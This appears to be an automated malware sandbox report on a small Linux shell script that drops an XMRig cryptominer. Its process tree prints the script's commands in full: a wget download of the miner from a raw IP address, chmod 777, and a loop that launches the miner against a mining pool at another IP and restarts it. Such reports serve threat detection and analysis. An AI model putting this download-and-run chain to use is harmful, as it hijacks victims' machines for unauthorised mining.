Analysis
-
max time kernel
149s -
max time network
42s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
30-12-2024 02:25
Static task
static1
Behavioral task
behavioral1
Sample
82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97.sh
-
Size
438B
-
MD5
52f6ef322dd61383cc5f03bba971ecc1
-
SHA1
a540ec9917e63a178aa44b3f3570a54ff8c88135
-
SHA256
82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97
-
SHA512
c17b540e81ca673cfb39cedb1417bfebb0367d61f9f9315710713bc0167cfb953b2b0fdec2bad0435c4ac423e41935fac7fa76ceb288f07174273b9f32f1d938
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral2/files/fstream-1.dat family_xmrig behavioral2/files/fstream-1.dat xmrig -
Xmrig family
-
Xmrig_linux family
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 749 chmod -
Executes dropped EXE 24 IoCs
ioc pid Process /tmp/xmrig 751 xmrig /tmp/xmrig 756 xmrig /tmp/xmrig 762 xmrig /tmp/xmrig 766 xmrig /tmp/xmrig 772 xmrig /tmp/xmrig 776 xmrig /tmp/xmrig 782 xmrig /tmp/xmrig 786 xmrig /tmp/xmrig 792 xmrig /tmp/xmrig 796 xmrig /tmp/xmrig 802 xmrig /tmp/xmrig 806 xmrig /tmp/xmrig 812 xmrig /tmp/xmrig 816 xmrig /tmp/xmrig 822 xmrig /tmp/xmrig 826 xmrig /tmp/xmrig 832 xmrig /tmp/xmrig 836 xmrig /tmp/xmrig 842 xmrig /tmp/xmrig 846 xmrig /tmp/xmrig 852 xmrig /tmp/xmrig 856 xmrig /tmp/xmrig 862 xmrig /tmp/xmrig 866 xmrig -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 24 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pgrep -
description ioc Process File opened for reading /proc/638/status pgrep File opened for reading /proc/26/cmdline pgrep File opened for reading /proc/275/status pgrep File opened for reading /proc/139/status pgrep File opened for reading /proc/98/cmdline pgrep File opened for reading /proc/275/cmdline pgrep File opened for reading /proc/9/cmdline pgrep File opened for reading /proc/17/cmdline pgrep File opened for reading /proc/19/status pgrep File opened for reading /proc/26/cmdline pgrep File opened for reading /proc/754/status pgrep File opened for reading /proc/19/status pgrep File opened for reading /proc/139/cmdline pgrep File opened for reading /proc/136/status pgrep File opened for reading /proc/27/cmdline pgrep File opened for reading /proc/583/cmdline pgrep File opened for reading /proc/23/status pgrep File opened for reading /proc/765/status pgrep File opened for reading /proc/567/cmdline pgrep File opened for reading /proc/41/status pgrep File opened for reading /proc/3/cmdline pgrep File opened for reading /proc/43/status pgrep File opened for reading /proc/29/status pgrep File opened for reading /proc/567/cmdline pgrep File opened for reading /proc/314/cmdline pgrep File opened for reading /proc/43/cmdline pgrep File opened for reading /proc/14/status pgrep File opened for reading /proc/28/status pgrep File opened for reading /proc/637/status pgrep File opened for reading /proc/587/status pgrep File opened for reading /proc/109/status pgrep File opened for reading /proc/214/status pgrep File opened for reading /proc/587/status pgrep File opened for reading /proc/41/cmdline pgrep File opened for reading /proc/16/status pgrep File opened for reading /proc/148/cmdline pgrep File opened for reading /proc/29/cmdline pgrep File opened for reading /proc/136/status pgrep File opened for reading /proc/567/cmdline pgrep File opened for reading /proc/585/status pgrep File opened for reading /proc/8/cmdline pgrep File opened for reading /proc/567/cmdline pgrep File opened for reading /proc/583/cmdline pgrep File opened for reading /proc/3/status pgrep File opened for reading /proc/23/status pgrep File opened for reading /proc/43/cmdline pgrep File opened for reading /proc/29/status pgrep File opened for reading /proc/632/cmdline pgrep File opened for reading /proc/29/cmdline pgrep File opened for reading /proc/278/status pgrep File opened for reading /proc/162/status pgrep File opened for reading /proc/21/status pgrep File opened for reading /proc/632/status pgrep File opened for reading /proc/25/status pgrep File opened for reading /proc/76/cmdline pgrep File opened for reading /proc/98/status pgrep File opened for reading /proc/825/cmdline pgrep File opened for reading /proc/275/status pgrep File opened for reading /proc/5/cmdline pgrep File opened for reading /proc/21/cmdline pgrep File opened for reading /proc/10/status pgrep File opened for reading /proc/15/cmdline pgrep File opened for reading /proc/277/status pgrep File opened for reading /proc/4/status pgrep -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/xmrig wget
Processes
-
/tmp/82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97.sh/tmp/82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97.sh1⤵PID:635
-
/usr/bin/nohupnohup bash /tmp/82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97.sh nobg1⤵PID:637
-
/usr/local/sbin/bashbash /tmp/82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97.sh nobg1⤵PID:637
-
/usr/local/bin/bashbash /tmp/82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97.sh nobg1⤵PID:637
-
/usr/sbin/bashbash /tmp/82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97.sh nobg1⤵PID:637
-
/usr/bin/bashbash /tmp/82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97.sh nobg1⤵PID:637
-
/sbin/bashbash /tmp/82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97.sh nobg1⤵PID:637
-
/bin/bashbash /tmp/82d5f1b0b96907494a793d1cd838b2ea1b8fc7f7e758ae56bcc75d89ed6f3e97.sh nobg1⤵PID:637
-
/usr/bin/wgetwget http://81.28.10.96/xmrig --no-check-certificate -O xmrig2⤵
- Writes file to tmp directory
PID:645
-
-
/bin/chmodchmod 777 xmrig2⤵
- File and Directory Permissions Modification
PID:749
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:750
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:751
-
-
/bin/sleepsleep 52⤵PID:752
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:755
-
-
/bin/sleepsleep 52⤵PID:757
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:756
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:761
-
-
/bin/sleepsleep 52⤵PID:763
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:762
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:765
-
-
/bin/sleepsleep 52⤵PID:767
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:766
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:771
-
-
/bin/sleepsleep 52⤵PID:773
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:772
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:775
-
-
/bin/sleepsleep 52⤵PID:777
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:776
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:781
-
-
/bin/sleepsleep 52⤵PID:783
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:782
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:785
-
-
/bin/sleepsleep 52⤵PID:787
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:786
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:791
-
-
/bin/sleepsleep 52⤵PID:793
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:792
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:795
-
-
/bin/sleepsleep 52⤵PID:797
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:796
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:801
-
-
/bin/sleepsleep 52⤵PID:803
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:802
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:805
-
-
/bin/sleepsleep 52⤵PID:807
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:806
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:811
-
-
/bin/sleepsleep 52⤵PID:813
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:812
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:815
-
-
/bin/sleepsleep 52⤵PID:817
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:816
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:821
-
-
/bin/sleepsleep 52⤵PID:823
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:822
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:825
-
-
/bin/sleepsleep 52⤵PID:827
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:826
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:831
-
-
/bin/sleepsleep 52⤵PID:833
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:832
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:835
-
-
/bin/sleepsleep 52⤵PID:837
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:836
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:841
-
-
/bin/sleepsleep 52⤵PID:843
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:842
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:845
-
-
/bin/sleepsleep 52⤵PID:847
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:846
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
PID:851
-
-
/bin/sleepsleep 52⤵PID:853
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:852
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:855
-
-
/bin/sleepsleep 52⤵PID:857
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:856
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:861
-
-
/bin/sleepsleep 52⤵PID:863
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:862
-
-
/usr/bin/pgreppgrep -x xmrig2⤵
- Reads CPU attributes
- Reads runtime system information
PID:865
-
-
/bin/sleepsleep 52⤵PID:867
-
-
/tmp/xmrig./xmrig --url 193.232.178.53:80 -B2⤵
- Executes dropped EXE
PID:866
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.9MB
MD58f4fff0ded94f1141768220906abfbb8
SHA1ea7c97294f415dc8713ac8c280b3123da62f6e56
SHA256b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d
SHA5120096072a1482f8e7999867baa3dd6e96d51591e9f7645c9ff276b53984957025c83e1fe52e5c4f55639eeed2bdbd80bbd57d7dacd84468ce09c834e39dfc4bee